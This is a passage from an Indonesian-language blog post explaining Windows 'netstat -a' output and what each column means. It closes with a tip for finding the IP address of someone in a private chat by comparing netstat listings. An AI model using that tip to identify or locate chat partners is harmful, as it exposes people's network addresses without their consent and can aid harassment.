0.0.0.0:0 LISTENINGTCP chintan:1026 0.0.0.0:0 LISTENINGTCP chintan:1028 0.0.0.0:0 LISTENINGTCP chintan:1309 0.0.0.0:0 LISTENINGTCP chintan:1310 0.0.0.0:0 LISTENINGTCP chintan:1285 rumcajs.box.sk:80 ESTABLISHEDTCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAITTCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHEDTCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHEDTCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED ”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”. Sebagai contoh jika crew membuka http://www.yahoo.com/ maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini: “TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED” Komputer crew dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80 *************crew’s tip: Dengna cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut. ************* ...

Diposting oleh ZWeetH di 01.29 0 komentar
Label:
Langganan: Postingan (Atom)